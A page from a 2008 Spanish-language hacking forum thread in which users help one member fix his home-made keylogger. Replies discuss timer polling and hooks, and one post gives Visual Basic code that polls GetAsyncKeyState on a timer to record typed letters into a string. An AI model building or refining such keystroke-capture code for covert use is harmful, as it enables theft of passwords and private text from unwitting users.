elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Problema con mi Keylogger
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: Problema con mi Keylogger  (Leído 4,626 veces)
& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Re: Problema con mi Keylogger
« Respuesta #10 en: 6 Octubre 2008, 20:05 pm »

Y si no lo hago con timer, ¿como lo hago? Gracias.


En línea

skapunky
Electronik Engineer &
Colaborador
***
Desconectado Desconectado

Mensajes: 3.667


www.killtrojan.net


Ver Perfil WWW
Re: Problema con mi Keylogger
« Respuesta #11 en: 6 Octubre 2008, 21:05 pm »

Hay un metodo llamado "Por encuesta" que trata de eliminar justamente errores de repeticiónes mecanicas en teclados. Este metodo es muy utilizado en teclados matriciales por ejemplo en electrónica y en este caso puede ser exactamente aplicable a la informática.

Trata de pillar el valor de una tecla, guardarlo, esperar un tiempo muy corto,volver a captar el valor de la tecla, y por ultimo comparar.

Lo malo que si expresamente un usuario clikea dos veces la misma tecla solo te lo captara una vez, pero como pista te dire que con un segundo timer a menor tiempo puedes comprobarlo.

Otra alternativa es la chapuza de ir probando tiempos como te han dicho...aunque yo de eso no me fiaria al 100% ya que npo todos los teclados son iguales de "rapidos".


En línea

Killtrojan Syslog v1.44: ENTRAR
& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Re: Problema con mi Keylogger
« Respuesta #12 en: 6 Octubre 2008, 21:20 pm »

¿Y los keyloggers como lo hacen? Ya que los keyloggers si que lo pillan todo ala perfección.
En línea

el_c0c0


Desconectado Desconectado

Mensajes: 307


Ver Perfil
Re: Problema con mi Keylogger
« Respuesta #13 en: 6 Octubre 2008, 21:49 pm »

¿Y los keyloggers como lo hacen? Ya que los keyloggers si que lo pillan todo ala perfección.
con hooks..
En línea

'-     coco
"Te voy a romper el orto"- Las hemorroides
& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Re: Problema con mi Keylogger
« Respuesta #14 en: 6 Octubre 2008, 22:01 pm »

y un hook que es?
En línea

w0od93

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Re: Problema con mi Keylogger
« Respuesta #15 en: 6 Octubre 2008, 22:39 pm »

Estoy en un portatil, mira el code

Código
  1. Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
  2. Dim cadena As String
  3.  
  4. Private Sub Timer1_Timer()
  5.    If GetAsyncKeyState(vbKeyA) <> 0 Then
  6.     cadena = cadena + "a"
  7.    If GetAsyncKeyState(vbKeyB) <> 0 Then
  8.     cadena = cadena + "b"
  9.     ElseIf GetAsyncKeyState(vbKeyC) <> 0 Then
  10.     cadena = cadena + "c"
  11.     ElseIf GetAsyncKeyState(vbKeyD) <> 0 Then
  12.     cadena = cadena + "d"
  13.     ElseIf GetAsyncKeyState(vbKeyE) <> 0 Then
  14.     cadena = cadena + "e"
  15.     ElseIf GetAsyncKeyState(vbKeyF) <> 0 Then
  16.     cadena = cadena + "f"
  17.     ElseIf GetAsyncKeyState(vbKeyG) <> 0 Then
  18.     cadena = cadena + "g"
  19.     ElseIf GetAsyncKeyState(vbKeyH) <> 0 Then
  20.     cadena = cadena + "h"
  21.     ElseIf GetAsyncKeyState(vbKeyI) <> 0 Then
  22.     cadena = cadena + "i"
  23.     ElseIf GetAsyncKeyState(vbKeyJ) <> 0 Then
  24.     cadena = cadena + "j"
  25.     ElseIf GetAsyncKeyState(vbKeyK) <> 0 Then
  26.     cadena = cadena + "k"
  27.     ElseIf GetAsyncKeyState(vbKeyL) <> 0 Then
  28.     cadena = cadena + "l"
  29.     ElseIf GetAsyncKeyState(vbKeyM) <> 0 Then
  30.     cadena = cadena + "m"
  31.     ElseIf GetAsyncKeyState(vbKeyN) <> 0 Then
  32.     cadena = cadena + "n"
  33.     ElseIf GetAsyncKeyState(vbKeyR) <> 0 Then
  34.     cadena = cadena + "r"
  35.     ElseIf GetAsyncKeyState(vbKeyO) <> 0 Then
  36.     cadena = cadena + "o"
  37.     ElseIf GetAsyncKeyState(vbKeyP) <> 0 Then
  38.     cadena = cadena + "p"
  39.     ElseIf GetAsyncKeyState(vbKeyQ) <> 0 Then
  40.     cadena = cadena + "q"
  41.     ElseIf GetAsyncKeyState(vbKeyS) <> 0 Then
  42.     cadena = cadena + "s"
  43.     ElseIf GetAsyncKeyState(vbKeyT) <> 0 Then
  44.     cadena = cadena + "t"
  45.     ElseIf GetAsyncKeyState(vbKeyU) <> 0 Then
  46.     cadena = cadena + "u"
  47.     ElseIf GetAsyncKeyState(vbKeyW) <> 0 Then
  48.     cadena = cadena + "w"
  49.   ElseIf GetAsyncKeyState(vbKeyX) <> 0 Then
  50.     cadena = cadena + "x"
  51.     ElseIf GetAsyncKeyState(vbKeyY) <> 0 Then
  52.     cadena = cadena + "y"
  53.     ElseIf GetAsyncKeyState(vbKeyZ) <> 0 Then
  54.     cadena = cadena + "z"
  55.     ElseIf GetAsyncKeyState(32) <> 0 Then
  56.     cadena = cadena + " "
  57.     ElseIf GetAsyncKeyState(13) <> 0 Then
  58.     cadena = cadena + vbNewLine
  59.     ElseIf GetAsyncKeyState(63) <> 0 Then
  60.     cadena = cadena + "?"
  61.     ElseIf GetAsyncKeyState(191) <> 0 Then
  62.     cadena = cadena + "¿"
  63.     End If
  64.     Text1.Text = cadena
  65. End Sub

Te falta la "v" :P
En línea

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Exploit+keylogger problema con el puerto?
Bugs y Exploits
akibara 5 6,511 Último mensaje 21 Enero 2012, 04:53 am
por CloudswX
Problema Keylogger L
Programación Visual Basic
RiverPlate96 1 2,014 Último mensaje 13 Diciembre 2012, 17:33 pm
por Danyfirex
Problema con keylogger
Scripting
Panic0 0 2,026 Último mensaje 30 Agosto 2020, 04:12 am
por Panic0
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines